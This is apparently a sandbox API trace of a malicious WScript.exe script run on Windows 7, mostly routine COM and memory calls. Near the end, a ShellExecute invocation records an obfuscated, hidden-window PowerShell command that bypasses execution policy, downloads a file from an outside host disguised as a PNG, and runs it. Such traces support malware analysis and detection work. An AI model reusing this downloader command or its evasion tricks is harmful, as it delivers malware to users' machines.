	[0069.691] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21fa88 | out: ppv=0x21fa88*=0x3cf420) returned 0x0
	[0069.691] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0069.692] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.692] GetTickCount () returned 0x222db
	[0069.692] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x221818 | out: ppv=0x221818*=0x3cf420) returned 0x0
	[0069.692] ??3@YAXPEAX@Z () returned 0x1
	[0069.694] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.695] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0069.695] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.695] GetTickCount () returned 0x222db
	[0069.696] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.701] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.702] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0069.702] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.702] GetTickCount () returned 0x222db
	[0069.704] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.704] ??3@YAXPEAX@Z () returned 0x4f900ef0001
	[0069.704] ??3@YAXPEAX@Z () returned 0x4fa01ac0001
	[0069.706] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.706] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0069.706] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.706] GetTickCount () returned 0x222db
	[0069.708] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.708] ??3@YAXPEAX@Z () returned 0x1
	[0069.708] ??3@YAXPEAX@Z () returned 0x5a500920001
	[0069.711] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.711] ??3@YAXPEAX@Z () returned 0x44c00e90001
	[0069.712] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0069.712] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.712] GetTickCount () returned 0x222ea
	[0069.713] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.752] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21d9b8 | out: ppv=0x21d9b8*=0x3cf420) returned 0x0
	[0069.752] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0069.752] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.752] GetTickCount () returned 0x2230a
	[0069.754] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x221818 | out: ppv=0x221818*=0x3cf420) returned 0x0
	[0069.754] ??3@YAXPEAX@Z () returned 0x75401ca0001
	[0069.754] ??3@YAXPEAX@Z () returned 0x755002f0001
	[0069.757] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21bc28 | out: ppv=0x21bc28*=0x3cf420) returned 0x0
	[0069.757] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0069.757] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.757] GetTickCount () returned 0x22319
	[0069.759] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21bc28 | out: ppv=0x21bc28*=0x3cf420) returned 0x0
	[0069.759] ??3@YAXPEAX@Z () returned 0x5b7012e0001
	[0069.759] ??3@YAXPEAX@Z () returned 0x5b801d30001
	[0069.761] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21bc28 | out: ppv=0x21bc28*=0x3cf420) returned 0x0
	[0069.762] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0069.762] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.762] GetTickCount () returned 0x22319
	[0069.763] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21bc28 | out: ppv=0x21bc28*=0x3cf420) returned 0x0
	[0069.764] ??3@YAXPEAX@Z () returned 0x858003e0001
	[0069.764] ??3@YAXPEAX@Z () returned 0x85901b20001
	[0069.766] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x217dc8 | out: ppv=0x217dc8*=0x3cf420) returned 0x0
	[0069.767] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0069.767] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.767] GetTickCount () returned 0x22319
	[0069.771] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f2d88 | out: ppv=0x1f2d88*=0x3cf420) returned 0x0
	[0069.771] ??3@YAXPEAX@Z () returned 0x8de01130001
	[0069.771] ??3@YAXPEAX@Z () returned 0x8df00710001
	[0069.817] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a4e08 | out: ppv=0x1a4e08*=0x3cf420) returned 0x0
	[0069.818] free (_Block=0x586380) 
	[0069.818] ??3@YAXPEAX@Z () returned 0xc00620001
	[0069.818] ??3@YAXPEAX@Z () returned 0xb007a0001
	[0069.818] free (_Block=0x580990) 
	[0069.818] free (_Block=0x58a310) 
	[0069.818] ??3@YAXPEAX@Z () returned 0x1009c0001
	[0069.818] ??3@YAXPEAX@Z () returned 0x1002c0001
	[0069.818] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0069.818] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.818] GetTickCount () returned 0x22348
	[0069.857] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17de48 | out: ppv=0x17de48*=0x3cf420) returned 0x0
	[0069.865] _resetstkoflw () returned 0x1
	[0069.866] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0069.866] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0069.866] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0069.866] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0069.867] FreeResource (hResData=0x120b6c) returned 0
	[0069.867] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0069.867] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0069.867] LockResource (hResData=0x121c74) returned 0x121c74
	[0069.867] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0069.867] FreeResource (hResData=0x121c74) returned 0
	[0069.867] GetTickCount () returned 0x22386
	[0069.867] bsearch (_Key=0x1432e8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0069.868] ??2@YAPEAX_K@Z () returned 0x502700
	[0069.868] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2216c8 | out: ppv=0x2216c8*=0x3cf420) returned 0x0
	[0069.868] free (_Block=0x4e94f0) 
	[0069.868] ??3@YAXPEAX@Z () returned 0x1
	[0069.868] free (_Block=0x580ab0) 
	[0069.868] free (_Block=0x583260) 
	[0069.868] free (_Block=0x58a530) 
	[0069.868] ??3@YAXPEAX@Z () returned 0x1
	[0069.869] ??3@YAXPEAX@Z () returned 0x101120001
	[0069.869] free (_Block=0x580a20) 
	[0069.869] free (_Block=0x583470) 
	[0069.869] free (_Block=0x58a420) 
	[0069.869] ??3@YAXPEAX@Z () returned 0xe00910001
	[0069.869] ??3@YAXPEAX@Z () returned 0x1
	[0069.869] free (_Block=0x4e94b0) 
	[0069.869] free (_Block=0x580900) 
	[0069.869] free (_Block=0x58a200) 
	[0069.869] ??3@YAXPEAX@Z () returned 0xf00860001
	[0069.869] ??3@YAXPEAX@Z () returned 0xb001e0001
	[0069.869] free (_Block=0x4e9470) 
	[0069.869] ??3@YAXPEAX@Z () returned 0x1
	[0069.869] free (_Block=0x580870) 
	[0069.869] free (_Block=0x582e40) 
	[0069.870] free (_Block=0x58a0f0) 
	[0069.870] ??3@YAXPEAX@Z () returned 0x1000700001
	[0069.870] ??3@YAXPEAX@Z () returned 0x200420001
	[0069.870] free (_Block=0x5807e0) 
	[0069.870] free (_Block=0x583050) 
	[0069.870] free (_Block=0x589fe0) 
	[0069.870] ??3@YAXPEAX@Z () returned 0x1100650001
	[0069.870] ??3@YAXPEAX@Z () returned 0x1f00e90001
	[0069.870] free (_Block=0x4e9430) 
	[0069.870] free (_Block=0x5806c0) 
	[0069.870] free (_Block=0x589dc0) 
	[0069.870] ??3@YAXPEAX@Z () returned 0x12005a0001
	[0069.870] ??3@YAXPEAX@Z () returned 0xe01ec0001
	[0069.870] free (_Block=0x4e93f0) 
	[0069.870] ??3@YAXPEAX@Z () returned 0xf01d00001
	[0069.870] free (_Block=0x580630) 
	[0069.870] free (_Block=0x582a20) 
	[0069.870] free (_Block=0x57d9d0) 
	[0069.870] ??3@YAXPEAX@Z () returned 0x1300440001
	[0069.870] ??3@YAXPEAX@Z () returned 0x3003a0001
	[0069.870] free (_Block=0x5805a0) 
	[0069.870] free (_Block=0x582c30) 
	[0069.870] free (_Block=0x57d8c0) 
	[0069.871] ??3@YAXPEAX@Z () returned 0x1400390001
	[0069.871] ??3@YAXPEAX@Z () returned 0x2000e20001
	[0069.871] free (_Block=0x4e93b0) 
	[0069.871] free (_Block=0x580480) 
	[0069.871] free (_Block=0x57d6a0) 
	[0069.871] ??3@YAXPEAX@Z () returned 0x15002e0001
	[0069.871] ??3@YAXPEAX@Z () returned 0x1001c20001
	[0069.872] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0069.872] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0069.872] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x22cf20 | out: lpclsid=0x22cf20*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0069.876] SysStringLen (param_1=0x0) returned 0x0
	[0069.876] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0069.877] CoGetClassObject (in: rclsid=0x22cf20*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee1476300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22cef0 | out: ppv=0x22cef0*=0x54cb90) returned 0x0
	[0069.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22b1c0 | out: lpSystemTimeAsFileTime=0x22b1c0*(dwLowDateTime=0xa21b07e0, dwHighDateTime=0x1d543d1)) 
	[0069.885] GetCurrentProcessId () returned 0x1ec
	[0069.885] GetCurrentThreadId () returned 0x478
	[0069.885] GetTickCount () returned 0x22396
	[0069.885] QueryPerformanceCounter (in: lpPerformanceCount=0x22b1c8 | out: lpPerformanceCount=0x22b1c8*=19431117291) returned 1
	[0069.885] malloc (_Size=0x100) returned 0x56b970
	[0069.885] GetVersionExA (in: lpVersionInformation=0x22afa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe15a2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe1590000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22afa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0069.885] GetUserDefaultLCID () returned 0x409
	[0069.885] ??2@YAPEAX_K@Z () returned 0x54cb90
	[0069.886] ??2@YAPEAX_K@Z () returned 0x578c70
	[0069.886] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22cd20, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0069.886] lstrlenA (lpString="\\wscript.exe") returned 12
	[0069.886] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0069.886] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0069.886] GetModuleHandleA (lpModuleName=0x0) returned 0xffdb0000
	[0069.886] GetProcAddress (hModule=0xffdb0000, lpProcName=0x1) returned 0xffdbd7f8
	[0069.886] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0069.886] GetTickCount () returned 0x22396
	[0069.886] malloc (_Size=0x808) returned 0x56d6a0
	[0069.887] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22d1a8 | out: ppv=0x22d1a8*=0x3cf420) returned 0x0
	[0069.887] free (_Block=0x4c4ba0) 
	[0069.887] ??3@YAXPEAX@Z () returned 0x4e7f01
	[0069.900] CreateErrorInfo (in: pperrinfo=0x22bfc0 | out: pperrinfo=0x22bfc0*=0x3fa718) returned 0x0
	[0069.901] CErrorObject::SetGUID () returned 0x0
	[0069.901] CErrorObject::SetSource () returned 0x0
	[0069.901] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x22a700, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0069.901] FormatMessageW (in: dwFlags=0x500, lpSource=0x3fe5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x22bfd0, nSize=0x0, Arguments=0x22c040 | out: lpBuffer="\xb4a0\x44") returned 0x31
	[0069.901] CErrorObject::SetDescription () returned 0x0
	[0069.901] CErrorObject::SetHelpFile () returned 0x0
	[0069.901] CErrorObject::SetHelpContext () returned 0x0
	[0069.902] QueryInterface () returned 0x0
	[0069.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x3fa710) returned 0x0
	[0069.902] Release () returned 0x2
	[0069.902] IUnknown:Release (This=0x3fa710) returned 0x1
	[0069.902] LocalFree (hMem=0x44b4a0) returned 0x0
	[0069.902] IUnknown:Release (This=0x44a210) returned 0x1
	[0069.903] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x22b190 | out: lpclsid=0x22b190*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0069.906] SysStringLen (param_1=0x0) returned 0x0
	[0069.906] CoGetClassObject (in: rclsid=0x22b190*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee1476300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22b160 | out: ppv=0x22b160*=0x7fefdfd8d20) returned 0x0
	[0069.907] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7fee1476310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x22b168 | out: ppvObject=0x22b168*=0x0) returned 0x80004002
	[0069.907] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x22b150 | out: ppvObject=0x22b150*=0x3fa710) returned 0x0
	[0069.908] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0069.908] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee1476320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x22b130 | out: ppvObject=0x22b130*=0x3fa750) returned 0x0
	[0069.908] ??2@YAPEAX_K@Z () returned 0x54c830
	[0069.908] Shell:IObjectWithSite:SetSite (This=0x3fa750, pUnkSite=0x54c830) returned 0x0
	[0069.908] Shell:IUnknown:AddRef (This=0x54c830) returned 0x2
	[0069.909] Shell:IUnknown:Release (This=0x3fa750) returned 0x1
	[0069.909] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee1476370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x22b108 | out: ppvObject=0x22b108*=0x0) returned 0x80004002
	[0069.909] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee1476518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x22b080 | out: ppvObject=0x22b080*=0x0) returned 0x80004002
	[0069.909] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee14764f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x22b088 | out: ppvObject=0x22b088*=0x0) returned 0x80004002
	[0069.909] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee1476508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x22b090 | out: ppvObject=0x22b090*=0x0) returned 0x80004002
	[0069.909] Shell:IUnknown:QueryInterface (in: This=0x3fa710, riid=0x7fee1476340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x22b098 | out: ppvObject=0x22b098*=0x3fa710) returned 0x0
	[0069.909] GetTickCount () returned 0x223a6
	[0069.909] Shell:IUnknown:Release (This=0x3fa710) returned 0x1
	[0069.909] realloc (_Block=0x502b40, _Size=0x140) returned 0x5a9e50
	[0069.910] MulDiv (nNumber=958, nNumerator=100, nDenominator=3511) returned 27
	[0069.911] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.911] GetTickCount () returned 0x223a6
	[0069.914] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0069.914] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.914] GetTickCount () returned 0x223a6
	[0069.915] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0069.915] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0069.915] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0069.915] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0069.915] FreeResource (hResData=0x120b6c) returned 0
	[0069.916] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0069.916] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0069.916] LockResource (hResData=0x121c74) returned 0x121c74
	[0069.916] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0069.916] FreeResource (hResData=0x121c74) returned 0
	[0069.916] bsearch (_Key=0x1432e8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0069.917] Shell:IDispatch:GetIDsOfNames (in: This=0x3fa710, riid=0x7fee1476360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x22b290*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x22b140 | out: rgDispId=0x22b140*=1610809345) returned 0x0
	[0069.924] Shell:IUnknown:AddRef (This=0x3fa710) returned 0x2
	[0069.925] Shell:IDispatch:Invoke (in: This=0x3fa710, dispIdMember=1610809345, riid=0x7fee1476360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x22b028*(rgvarg=([0]=0x22b040*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x22b058*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x54cdf0), [2]=0x22b070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x54cdf0), [3]=0x22b088*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x54cdf0), [4]=0x22b0a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x54cdf0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x22b568, pExcepInfo=0x22afd0, puArgErr=0x22afc4 | out: pDispParams=0x22b028*(rgvarg=([0]=0x22b040*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x22b058*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x54cdf0), [2]=0x22b070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x54cdf0), [3]=0x22b088*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x54cdf0), [4]=0x22b0a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x54cdf0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x22b568*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x7fefd33ed80), pExcepInfo=0x22afd0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x22afc4*=0x43d5) returned 0x0
	[0070.772] Shell:IUnknown:Release (This=0x3fa710) returned 0x1
	[0070.777] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefec0a1b0, dwCookie=0x100) returned 0x0
	[0070.777] IUnknown:Release (This=0x2bf560) returned 0x1
	[0070.777] IUnknown:Release (This=0x3cf420) returned 0x1
	[0070.777] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.777] IUnknown:Release (This=0x3cf420) returned 0x0
	[0070.777] ISystemDebugEventFire:EndSession (This=0x3e75b0) returned 0x0
	[0070.777] IUnknown:Release (This=0x3e75b0) returned 0x1
	[0070.777] GetUserDefaultLCID () returned 0x409
	[0070.777] GetACP () returned 0x4e4
	[0070.778] IUnknown:Release (This=0x3e75b0) returned 0x0
	[0070.779] free (_Block=0x2bf640) 
	[0070.779] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.779] SendMessageA (hWnd=0x2022c, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
